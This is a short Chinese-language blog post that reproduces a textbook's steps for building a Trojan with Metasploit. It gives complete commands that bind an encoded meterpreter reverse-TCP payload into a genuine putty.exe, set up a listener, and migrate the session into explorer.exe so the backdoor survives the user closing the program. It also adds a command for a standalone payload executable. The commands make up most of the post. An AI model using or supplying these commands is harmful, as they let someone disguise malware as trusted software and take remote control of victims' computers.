metasploit制作木马程序

  第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:

  1)百度搜索,下载原版putty程序

  2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5。这样就生成了一个名为putty_backdoor.exe的木马程序。

  3)启动监听程序:msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 E

  4)将木马程序复制到靶机上运行,这时攻击机上就是获得一个远程连接的meterpreter会话。

  5)将木马线程迁移到进程explorer.exe上,命令为run migrate -n explorer.exe(或者是migrate <对应pid>)。

  6)这样,即使用户关闭了这个木马程序,也不会断开后门的连接。


  以下是我从网上搜索得到的步骤:

1)msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=80 X > Desktop/muma01.exe

(这个是将攻击代码包装成程序,上面2)的是将木马附在正常的程序上)

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值